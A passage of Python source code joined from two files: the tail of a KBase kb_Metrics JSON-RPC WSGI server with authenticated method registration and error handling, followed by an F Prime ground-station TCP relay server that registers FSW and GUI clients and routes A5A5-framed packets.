    return {name: value for name, value in parser.items(section)}
# Load the service configuration once at import time; the implementation
# module is imported afterwards because kb_Metrics takes the config on init.
config = get_config()
from kb_Metrics.kb_MetricsImpl import kb_Metrics  # noqa @IgnorePep8
impl_kb_Metrics = kb_Metrics(config)
class JSONObjectEncoder(json.JSONEncoder):
    """JSON encoder that additionally serializes sets, frozensets, and any
    object exposing a ``toJSONable()`` method."""

    def default(self, obj):
        if isinstance(obj, (set, frozenset)):
            # Sets are not JSON-serializable; emit them as lists.
            return list(obj)
        if hasattr(obj, 'toJSONable'):
            return obj.toJSONable()
        # Defer to the base class, which raises TypeError.
        return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
    """JSONRPCService variant that threads a per-call context object
    (``ctx``) through to every registered method and wraps uncaught method
    exceptions in a JSONServerError carrying the server-side traceback."""

    def call(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in a JSON
        string or None if there is none.
        Arguments:
        jsondata -- remote method call in jsonrpc format
        """
        result = self.call_py(ctx, jsondata)
        if result is not None:
            # Serialize with the custom encoder so sets / toJSONable
            # objects survive the round trip.
            return json.dumps(result, cls=JSONObjectEncoder)
        return None

    def _call_method(self, ctx, request):
        """Calls given method with given params and returns it value."""
        method = self.method_data[request['method']]['method']
        params = request['params']
        result = None
        try:
            if isinstance(params, list):
                # Does it have enough arguments?
                # (the "- 1" accounts for ctx being injected as the first
                # positional argument)
                if len(params) < self._man_args(method) - 1:
                    raise InvalidParamsError('not enough arguments')
                # Does it have too many arguments?
                if(not self._vargs(method) and len(params) >
                        self._max_args(method) - 1):
                    raise InvalidParamsError('too many arguments')
                result = method(ctx, *params)
            elif isinstance(params, dict):
                # Do not accept keyword arguments if the jsonrpc version is
                # not >=1.1.  (versions are stored as ints: 11 == "1.1")
                if request['jsonrpc'] < 11:
                    raise KeywordError
                result = method(ctx, **params)
            else:  # No params
                result = method(ctx)
        except JSONRPCError:
            # Protocol-level errors pass through untouched.
            raise
        except Exception as e:
            # log.exception('method %s threw an exception' % request['method'])
            # Exception was raised inside the method.
            # Wrap it so the client receives the repr'd args plus the
            # server-side traceback in the error's trace field.
            newerr = JSONServerError()
            newerr.trace = traceback.format_exc()
            if len(e.args) == 1:
                newerr.data = repr(e.args[0])
            else:
                newerr.data = repr(e.args)
            raise newerr
        return result

    def call_py(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in python
        object format or None if there is none.
        This method is same as call() except the return value is a python
        object instead of JSON string. This method is mainly only useful for
        debugging purposes.
        """
        rdata = jsondata
        # we already deserialize the json string earlier in the server code, no
        # need to do it again
        # try:
        #     rdata = json.loads(jsondata)
        # except ValueError:
        #     raise ParseError
        # set some default values for error handling
        request = self._get_default_vals()
        if isinstance(rdata, dict) and rdata:
            # It's a single request.
            self._fill_request(request, rdata)
            respond = self._handle_request(ctx, request)
            # Don't respond to notifications
            if respond is None:
                return None
            return respond
        elif isinstance(rdata, list) and rdata:
            # It's a batch.
            requests = []
            responds = []
            for rdata_ in rdata:
                # set some default values for error handling
                request_ = self._get_default_vals()
                self._fill_request(request_, rdata_)
                requests.append(request_)
            for request_ in requests:
                respond = self._handle_request(ctx, request_)
                # Don't respond to notifications
                if respond is not None:
                    responds.append(respond)
            if responds:
                return responds
            # Nothing to respond.
            return None
        else:
            # empty dict, list or wrong type
            raise InvalidRequestError

    def _handle_request(self, ctx, request):
        """Handles given request and returns its response."""
        # Optional per-method param type validation, configured via the
        # 'types' entry passed to rpc_service.add().
        if 'types' in self.method_data[request['method']]:
            self._validate_params_types(request['method'], request['params'])
        result = self._call_method(ctx, request)
        # Do not respond to notifications.
        if request['id'] is None:
            return None
        respond = {}
        self._fill_ver(request['jsonrpc'], respond)
        respond['result'] = result
        respond['id'] = request['id']
        return respond
class MethodContext(dict):
    """Per-call context passed as the first argument to service methods.

    A dict with a fixed key set (client_ip, user_id, token, module, method,
    call_id, rpc_context, provenance, ...) plus logging helpers bound to the
    server's logger.
    """

    def __init__(self, logger):
        # All context keys start out unset; the WSGI handler fills them in
        # per request.
        self['client_ip'] = None
        self['user_id'] = None
        self['authenticated'] = None
        self['token'] = None
        self['module'] = None
        self['method'] = None
        self['call_id'] = None
        self['rpc_context'] = None
        self['provenance'] = None
        # Levels accepted verbatim by log_debug without remapping.
        self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
        self._logger = logger

    def log_err(self, message):
        """Log *message* at ERROR level."""
        self._log(log.ERR, message)

    def log_info(self, message):
        """Log *message* at INFO level."""
        self._log(log.INFO, message)

    def log_debug(self, message, level=1):
        """Log a debug message.  *level* may be 1-3 (mapped to syslog
        levels 7-9) or one of the pre-mapped debug levels."""
        if level in self._debug_levels:
            pass
        else:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            # Map debug levels 1-3 onto syslog-style levels 7-9.
            level = level + 6
        self._log(level, message)

    def set_log_level(self, level):
        self._logger.set_log_level(level)

    def get_log_level(self):
        return self._logger.get_log_level()

    def clear_log_level(self):
        self._logger.clear_user_log_level()

    def _log(self, level, message):
        # Stamp every record with the request's identity fields.
        self._logger.log_message(level, message, self['client_ip'],
                                 self['user_id'], self['module'],
                                 self['method'], self['call_id'])

    def provenance(self):
        """Return provenance for this call.

        When running under an SDK callback server (SDK_CALLBACK_URL set),
        query it for the real provenance; otherwise return the locally
        recorded 'provenance' entry.  Raises ServerError on callback
        failures.
        """
        callbackURL = os.environ.get('SDK_CALLBACK_URL')
        if callbackURL:
            # OK, there's a callback server from which we can get provenance
            arg_hash = {'method': 'CallbackServer.get_provenance',
                        'params': [],
                        'version': '1.1',
                        'id': str(_random.random())[2:]
                        }
            body = json.dumps(arg_hash)
            response = _requests.post(callbackURL, data=body,
                                      timeout=60)
            response.encoding = 'utf-8'
            if response.status_code == 500:
                # A 500 may carry a structured JSON-RPC error body;
                # surface it as a ServerError either way.
                if ('content-type' in response.headers and
                        response.headers['content-type'] ==
                        'application/json'):
                    err = response.json()
                    if 'error' in err:
                        raise ServerError(**err['error'])
                    else:
                        raise ServerError('Unknown', 0, response.text)
                else:
                    raise ServerError('Unknown', 0, response.text)
            if not response.ok:
                response.raise_for_status()
            resp = response.json()
            if 'result' not in resp:
                raise ServerError('Unknown', 0,
                                  'An unknown server error occurred')
            return resp['result'][0]
        else:
            return self.get('provenance')
class ServerError(Exception):
    '''
    The call returned an error. Fields:
    name - the name of the error.
    code - the error code.
    message - a human readable error message.
    data - the server side stacktrace.
    '''

    def __init__(self, name, code, message, data=None, error=None):
        super(Exception, self).__init__(message)
        self.name = name
        self.code = code
        self.message = message if message else ''
        # JSON RPC 2.0 supplies 'data'; JSON RPC 1.1 supplies 'error'.
        self.data = data or error or ''

    def __str__(self):
        return '{}: {}. {}\n{}'.format(
            self.name, self.code, self.message, self.data)
def getIPAddress(environ):
    """Best-effort client IP: proxy headers first (unless the config says
    not to trust them), then the WSGI REMOTE_ADDR."""
    forwarded_for = environ.get('HTTP_X_FORWARDED_FOR')
    real_ip = environ.get('HTTP_X_REAL_IP')
    trust_headers = (config is None or
                     config.get('dont_trust_x_ip_headers') != 'true')
    if trust_headers:
        if forwarded_for:
            # X-Forwarded-For may be a chain; the first hop is the client.
            return forwarded_for.split(',')[0].strip()
        if real_ip:
            return real_ip.strip()
    return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_Metrics'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_Metrics.get_app_metrics,
name='kb_Metrics.get_app_metrics',
types=[dict])
self.method_authentication['kb_Metrics.get_app_metrics'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_jobs,
name='kb_Metrics.get_jobs',
types=[dict])
self.method_authentication['kb_Metrics.get_jobs'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.query_jobs,
name='kb_Metrics.query_jobs',
types=[dict])
self.method_authentication['kb_Metrics.query_jobs'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.query_jobs_admin,
name='kb_Metrics.query_jobs_admin',
types=[dict])
self.method_authentication['kb_Metrics.query_jobs_admin'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_job,
name='kb_Metrics.get_job',
types=[dict])
self.method_authentication['kb_Metrics.get_job'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.map_ws_narrative_names,
name='kb_Metrics.map_ws_narrative_names',
types=[list])
self.method_authentication['kb_Metrics.map_ws_narrative_names'] = 'optional' # noqa
self.rpc_service.add(impl_kb_Metrics.update_metrics,
name='kb_Metrics.update_metrics',
types=[dict])
self.method_authentication['kb_Metrics.update_metrics'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_user_details,
name='kb_Metrics.get_user_details',
types=[dict])
self.method_authentication['kb_Metrics.get_user_details'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_nonkbuser_details,
name='kb_Metrics.get_nonkbuser_details',
types=[dict])
self.method_authentication['kb_Metrics.get_nonkbuser_details'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_signup_returning_users,
name='kb_Metrics.get_signup_returning_users',
types=[dict])
self.method_authentication['kb_Metrics.get_signup_returning_users'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_signup_returning_nonkbusers,
name='kb_Metrics.get_signup_returning_nonkbusers',
types=[dict])
self.method_authentication['kb_Metrics.get_signup_returning_nonkbusers'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_user_counts_per_day,
name='kb_Metrics.get_user_counts_per_day',
types=[dict])
self.method_authentication['kb_Metrics.get_user_counts_per_day'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_total_logins,
name='kb_Metrics.get_total_logins',
types=[dict])
self.method_authentication['kb_Metrics.get_total_logins'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_nonkb_total_logins,
name='kb_Metrics.get_nonkb_total_logins',
types=[dict])
self.method_authentication['kb_Metrics.get_nonkb_total_logins'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_user_logins,
name='kb_Metrics.get_user_logins',
types=[dict])
self.method_authentication['kb_Metrics.get_user_logins'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_user_numObjs,
name='kb_Metrics.get_user_numObjs',
types=[dict])
self.method_authentication['kb_Metrics.get_user_numObjs'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_narrative_stats,
name='kb_Metrics.get_narrative_stats',
types=[dict])
self.method_authentication['kb_Metrics.get_narrative_stats'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_all_narrative_stats,
name='kb_Metrics.get_all_narrative_stats',
types=[dict])
self.method_authentication['kb_Metrics.get_all_narrative_stats'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.get_user_ws_stats,
name='kb_Metrics.get_user_ws_stats',
types=[dict])
self.method_authentication['kb_Metrics.get_user_ws_stats'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.is_admin,
name='kb_Metrics.is_admin',
types=[dict])
self.method_authentication['kb_Metrics.is_admin'] = 'required' # noqa
self.rpc_service.add(impl_kb_Metrics.status,
name='kb_Metrics.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_Metrics ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
    """Attach request metadata and trace info to *error* and serialize it.

    Mutates *error* in place and returns it as a JSON string. Where the
    trace ends up depends on which RPC flavor the request used (KBase
    1.1 'version', JSON-RPC 2.0 'jsonrpc', or neither).
    """
    if trace:
        # Log every traceback line except the trailing empty string.
        self.log(log.ERR, context, trace.split('\n')[0:-1])

    if 'id' in request:
        error['id'] = request['id']

    if 'version' in request:
        # KBase-style JSON-RPC 1.1 request.
        error['version'] = request['version']
        if not error['error'].get('error'):
            error['error']['error'] = trace
    elif 'jsonrpc' in request:
        # JSON-RPC 2.0 request: the trace goes into the 'data' member.
        error['jsonrpc'] = request['jsonrpc']
        error['error']['data'] = trace
    else:
        # Unversioned request: assume 1.0 semantics.
        error['version'] = '1.0'
        error['error']['error'] = trace
    return json.dumps(error)
def now_in_utc(self):
    """Return local "now" as an ISO-8601 string with a numeric UTC offset.

    Example: '2024-01-02T03:04:05.678901+05:30'. The offset is derived
    from the difference between naive local and UTC clocks, rounded to
    the nearest minute.
    """
    dtnow = datetime.datetime.now()
    dtutcnow = datetime.datetime.utcnow()
    delta = dtnow - dtutcnow
    # Total offset in minutes, rounded to the nearest minute.
    offset_min = (delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60
    # Format sign and magnitude separately: the old "%+02d" form did not
    # zero-pad the hours ('+5:30') and mis-rendered negative offsets
    # (divmod of negative minutes printed '-5:30' for UTC-4:30).
    sign = '+' if offset_min >= 0 else '-'
    hh, mm = divmod(abs(offset_min), 60)
    return "%s%s%02d:%02d" % (dtnow.isoformat(), sign, hh, mm)
# The single WSGI application instance served by this module.
application = Application()

# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
    import uwsgi
    # Before we do anything with the application, see if the
    # configs specify patching all std routines to be asynch
    # *ONLY* use this if you are going to wrap the service in
    # a wsgi container that has enabled gevent, such as
    # uwsgi with the --gevent option
    # NOTE(review): 'config' is presumably loaded at module scope
    # earlier in this file — confirm.
    if config is not None and config.get('gevent_monkeypatch_all', False):
        print("Monkeypatching std libraries for async")
        from gevent import monkey
        monkey.patch_all()
    uwsgi.applications = {'': application}
except ImportError:
    # Not available outside of wsgi, ignore
    pass

# Handle of the child process started by start_server(newprocess=True);
# None while no server process is running.
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    """Start the WSGI server.

    With the defaults the server binds localhost on a system-assigned
    port and serves in the current thread, blocking until interrupted.
    Pass newprocess=True to serve from a daemonized child process
    instead, which makes stop_server() usable and lets the caller use
    the returned (actually bound) port number.
    """
    global _proc
    if _proc:
        raise RuntimeError('server is already running')
    server = make_server(host, port, application)
    # port=0 asks the OS for a free port; report the one actually bound.
    port = server.server_address[1]
    print("Listening on port %s" % port)
    if not newprocess:
        server.serve_forever()
    else:
        _proc = Process(target=server.serve_forever)
        _proc.daemon = True
        _proc.start()
    return port
def stop_server():
    """Terminate the server process started via start_server(newprocess=True).

    Safe to call when no server is running: previously this raised
    AttributeError when _proc was None; now it is a no-op in that case.
    """
    global _proc
    if _proc is not None:
        _proc.terminate()
        _proc = None
def process_async_cli(input_file_path, output_file_path, token):
    """Run a single JSON-RPC request read from *input_file_path* and
    write the JSON response to *output_file_path*.

    Returns a process exit code: 0 on success, 500 if the response
    carries an 'error' member.
    """
    exit_code = 0
    with open(input_file_path) as data_file:
        req = json.load(data_file)
    # Fill in defaults for optional JSON-RPC envelope fields.
    if 'version' not in req:
        req['version'] = '1.1'
    if 'id' not in req:
        # Random decimal digits serve as a request id.
        req['id'] = str(_random.random())[2:]
    ctx = MethodContext(application.userlog)
    if token:
        # Validate the token and record the caller's identity.
        user = application.auth_client.get_user(token)
        ctx['user_id'] = user
        ctx['authenticated'] = 1
        ctx['token'] = token
    if 'context' in req:
        ctx['rpc_context'] = req['context']
    ctx['CLI'] = 1
    ctx['module'], ctx['method'] = req['method'].split('.')
    # Provenance record for the single call being made.
    prov_action = {'service': ctx['module'], 'method': ctx['method'],
                   'method_params': req['params']}
    ctx['provenance'] = [prov_action]
    resp = None
    try:
        resp = application.rpc_service.call_py(ctx, req)
    except JSONRPCError as jre:
        trace = jre.trace if hasattr(jre, 'trace') else None
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': jre.code,
                          'name': jre.message,
                          'message': jre.data,
                          'error': trace}
                }
    except Exception:
        # Anything unexpected becomes a generic code-0 server error.
        trace = traceback.format_exc()
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': 0,
                          'name': 'Unexpected Server Error',
                          'message': 'An unexpected server error occurred',
                          'error': trace}
                }
    if 'error' in resp:
        exit_code = 500
    with open(output_file_path, "w") as f:
        f.write(json.dumps(resp, cls=JSONObjectEncoder))
    return exit_code
if __name__ == "__main__":
    # Async-job CLI mode: <input.json> <output.json> [token-or-token-file]
    if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
            os.path.isfile(sys.argv[1])):
        token = None
        if len(sys.argv) == 4:
            # Third argument is either a file containing the token or
            # the token value itself.
            if os.path.isfile(sys.argv[3]):
                with open(sys.argv[3]) as token_file:
                    token = token_file.read()
            else:
                token = sys.argv[3]
        sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
    # Otherwise: stand-alone HTTP server mode.
    try:
        opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
    except GetoptError as err:
        # print help information and exit:
        print(str(err))  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print("Host set to %s" % host)
        else:
            assert False, "unhandled option"
    start_server(host=host, port=port)
    # print("Listening on port %s" % port)
    # httpd = make_server( host, port, application)
    #
    # httpd.serve_forever()
|
tcpserver.py | #!/usr/bin/env python3
from __future__ import print_function
import socket
import threading
try:
import queue
import socketserver
except ImportError:
import Queue as queue
import SocketServer as socketserver
import time
import os
import signal
import sys
import struct
import select
import multiprocessing
import errno
import time
import logging
from fprime.constants import DATA_ENCODING
from fprime.common.models.serialize.type_base import *
from optparse import OptionParser
__version__ = 0.1
__date__ = '2015-04-03'
__updated__ = '2016-04-07'

# Universal server id global
SERVER = None  # the ThreadedTCPServer instance; assigned in main()
LOCK = None    # server.lock_obj; guards dest_obj and the client lists below
shutdown_event = threading.Event()  # set to request an orderly shutdown

# Registered client bookkeeping: names and their paired numeric ids.
FSW_clients = []
GUI_clients = []
FSW_ids = []
GUI_ids = []
def signal_handler(signum, frame):
    """SIGINT handler: announce and request an orderly shutdown.

    The first parameter was renamed from 'signal' to 'signum' so it no
    longer shadows the imported signal module; handlers are invoked
    positionally, so the rename is caller-compatible.
    """
    print("Ctrl-C received, server shutting down.")
    shutdown_event.set()
def now():
    """Current wall-clock time as a human-readable ctime string."""
    # time.ctime() defaults to the current time.
    return time.ctime()
class ThreadedTCPRequestHandler(socketserver.StreamRequestHandler):
    """
    Derived from original Stable demo during R&TD and adapted
    for use in new FSW gse.py application.

    TCP socket server for commands, log events, and telemetry data.
    Later this will handle other things such as sequence files and parameters.

    Handle is instanced in own thread for each client.

    Registration is done by sending the string "Register <name>".
    Sending a message to destination <name> is done as
    "A5A5 <name> <data>" Note only <data> is sent.
    Any client that sends a "List" command makes the server display all
    registered clients.
    """
    # NOTE(review): these assignments mutate the *base class* attributes,
    # not just this subclass — presumably intentional so the server core
    # honors them; verify no other handler shares the base.
    socketserver.StreamRequestHandler.allow_reuse_address = True
    socketserver.StreamRequestHandler.timeout = 1

    def handle(self):  # on each client connect
        """
        The function that is invoked upon a new client. This function listens
        for data on the socket. Packets for now are assumed to be separated
        by a newline. For each packet, call processPkt.
        """
        self.partial = b''       # bytes of an incomplete command
        self.cmdQueue = []       # complete commands awaiting processing
        self.registered = False  # True once "Register <name>" succeeds
        self.name = b''
        self.id = 0
        # print self.client_address, now() # show this client's address
        # Read the data from the socket.
        # 13 bytes is exactly "Register GUI\n" / "Register FSW\n".
        data = self.recv(13)
        # Connection was closed by the client
        if not data:
            print("Client exited.")
            return
        else:
            # Process the data into the cmdQueue
            self.getCmds(data)
            # Process the cmdQueue
            self.processQueue()
            if self.registered:
                print("Registration complete waiting for message.")
                # Blocks here servicing messages until disconnect/shutdown.
                self.getNewMsg()
            else:
                print("Unable to register client.")
                return
            # Deregister this client under the global lock.
            LOCK.acquire()
            del SERVER.dest_obj[self.name]
            if self.name in FSW_clients:
                FSW_clients.remove(self.name)
                FSW_ids.remove(self.id)
            elif self.name in GUI_clients:
                GUI_clients.remove(self.name)
                GUI_ids.remove(self.id)
            LOCK.release()
        print("Closed %s connection." % self.name.decode(DATA_ENCODING))
        self.registered = False
        self.request.close()

    def getCmds(self, inputString, end_of_command=b'\n'):
        """
        Build a command from partial or full socket input
        """
        commands = inputString.split(end_of_command)
        if len(self.partial):
            # Prepend the leftover bytes from the previous read.
            commands[0] = self.partial + commands[0]
            self.partial = b''
        if len(commands[-1]):
            # Trailing bytes after the last newline: save for next read.
            self.partial = commands[-1]
            self.cmdQueue.extend(commands[:-1])
        else:
            self.cmdQueue.extend(commands[:-1])

    def processQueue(self):
        # Only registration commands are expected at this stage.
        for cmd in self.cmdQueue:
            self.processRegistration(cmd)
        self.cmdQueue = []

    def processRegistration(self, cmd):
        """Handle a "Register <name>" command and record the client."""
        params = cmd.split()
        id = 0
        if params[0] == b'Register':
            LOCK.acquire()
            name = params[1]
            if b'FSW' in name:
                if FSW_clients:
                    # Disambiguate repeat registrations with a numeric suffix.
                    # NOTE(review): on Python 3 bytes(id) yields id zero
                    # bytes, not the digits — looks like a Python 2
                    # leftover; verify intended client naming.
                    id = sorted(FSW_ids)[-1] + 1
                    name = params[1] + b'_' + bytes(id)
                FSW_clients.append(name)
                FSW_ids.append(id)
            elif b'GUI' in name:
                if GUI_clients:
                    id = sorted(GUI_ids)[-1] + 1
                    name = params[1] + b'_' + bytes(id)
                GUI_clients.append(name)
                GUI_ids.append(id)
            SERVER.dest_obj[name] = DestObj(name, self.request)
            LOCK.release()
            self.registered = True
            self.name = name
            self.id = id
            print("Registered client " + self.name.decode(DATA_ENCODING))

    #################################################
    # New Routines to process the command messages
    #################################################
    def getNewMsg(self):
        """
        After registration wait for an incoming message
        The first part must always be an "A5A5 " or a "List "
        """
        # Loop while the connected client has packets to send/receive
        while not shutdown_event.is_set():
            # Read the header data from the socket either A5A5 or List
            header = self.readHeader()
            # If the received header is an empty string, connection closed, exit loop
            if not header:
                break
            elif header == b"Quit":
                # Global shutdown: wake this client's peer, stop the
                # server, and exit the loop.
                LOCK.acquire()
                print("Quit received!")
                SERVER.dest_obj[self.name].put(struct.pack(">I", 0xA5A5A5A5))
                shutdown_event.set()
                time.sleep(1)
                print("Quit processed!")
                SERVER.shutdown()
                SERVER.server_close()
                LOCK.release()
                break
            # Got the header data so read the data of the message here...
            data = self.readData(header)
            # Process and send the packet of the message here...
            self.processNewPkt(header, data)

    def recv(self, l):
        """
        Read l bytes from socket.
        """
        chunk = b''
        msg = b""
        n = 0
        while l > n:
            try:
                chunk = self.request.recv(l - n)
                if chunk == b'':
                    print("read data from socket is empty!")
                    return b''
                msg = msg + chunk
                n = len(msg)
            except socket.timeout:
                if shutdown_event.is_set():
                    print("socket timed out and shutdown is requested")
                    return b"Quit\n"
                # Timeout without shutdown: keep waiting for the rest.
                continue
            except socket.error as err:
                # NOTE(review): after a hard socket error the loop keeps
                # retrying recv() — potential busy loop; verify.
                if err.errno == errno.ECONNRESET:
                    print("Socket error " + str(err.errno) + " (Connection reset by peer) occurred on recv().")
                else:
                    print("Socket error " + str(err.errno) + " occurred on recv().")
        return msg

    def readHeader(self):
        """
        Read the 9 byte header (e.g. "A5A5 GUI " or "A5A5 FSW "),
        or just read the "List\n" command.
        """
        header = self.recv(5)
        if len(header) == 0:
            print("Header information is empty, client " + self.name.decode(DATA_ENCODING) + " exiting.")
            return header
        if header == b"List\n":
            return b"List"
        elif header == b"Quit\n":
            return b"Quit"
        elif header[:-1] == b"A5A5":
            # Read the remaining 4 bytes of the 9-byte routing header.
            header2 = self.recv(4)
            return (header + header2)
        else:
            # Unrecognized header: returns None, ending the client loop.
            return

    def readData(self, header):
        """
        Read the data part of the message sent to either GUI or FSW.
        GUI receives telemetry.
        FSW receives commands of various lengths.
        """
        data = b""
        if header == b"List":
            return b""
        elif header == b"Quit":
            return b""
        dst = header.split(b" ")[1].strip(b" ")
        if dst == b"FSW":
            # Read variable length command data here...
            # Frame: 4-byte descriptor, 4-byte big-endian size, payload.
            desc = self.recv(4)
            sizeb = self.recv(4)
            size = struct.unpack(">I", sizeb)[0]
            data = desc + sizeb + self.recv(size)
        elif dst == b"GUI":
            # Read telemetry data here...
            # Frame: 4-byte big-endian size, payload.
            tlm_packet_size = self.recv(4)
            size = struct.unpack(">I", tlm_packet_size)[0]
            data = tlm_packet_size + self.recv(size)
        else:
            raise RuntimeError("unrecognized client %s" % dst.decode(DATA_ENCODING))
        return data

    def processNewPkt(self, header, data):
        """
        Process a single command here header and data here.
        The command must always start with A5A5 except if it is a List.
        Once the entire header string is processed send it on queue.
        If something goes wrong report and shutdown server.
        """
        dest_list = []
        if header == b"List":
            print("List of registered clients: ")
            LOCK.acquire()
            for d in list(SERVER.dest_obj.keys()):
                print("\t" + SERVER.dest_obj[d].name.decode(DATA_ENCODING))
                # Length-prefixed client name record sent back to requester.
                reg_client_str = b"List " + SERVER.dest_obj[d].name
                l = len(reg_client_str)
                reg_client_str = struct.pack("i%ds" % l, l, reg_client_str)
                self.request.send(reg_client_str)
            LOCK.release()
            return 0
        # Process data here...
        head, dst = header.strip(b" ").split(b" ")
        if head == b'A5A5':  # Packet Header
            # print "Received Packet: %s %s...\n" % (head,dst)
            if data == b'':
                print(" Data is empty, returning.")
            if b'GUI' in dst:
                dest_list = GUI_clients
            elif b'FSW' in dst:
                dest_list = FSW_clients
            # Fan the payload out to every registered peer of that type.
            for dest_elem in dest_list:
                # print "Locking TCP"
                LOCK.acquire()
                if dest_elem in list(SERVER.dest_obj.keys()):
                    # Send the message here....
                    # print "Sending TCP msg to ", dest_elem
                    SERVER.dest_obj[dest_elem].put(data)
                LOCK.release()
        else:
            raise RuntimeError("Packet missing A5A5 header")
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
    """
    Derived from original Stable demo during R&TD and adapted
    for use in new FSW gse.py application.

    TCP socket server for commands, log events, and telemetry data.
    Later this will handle other things such as sequence files and parameters.

    Handle is instanced in own thread for each client.

    Registration is done by sending the string "Register <name>".
    Sending a message to destination <name> is done as
    "A5A5 <name> <data>" Note only <data> is sent.
    Any client that sends a "List" command makes the server display all
    registered clients.
    """
    socketserver.BaseRequestHandler.allow_reuse_address = True

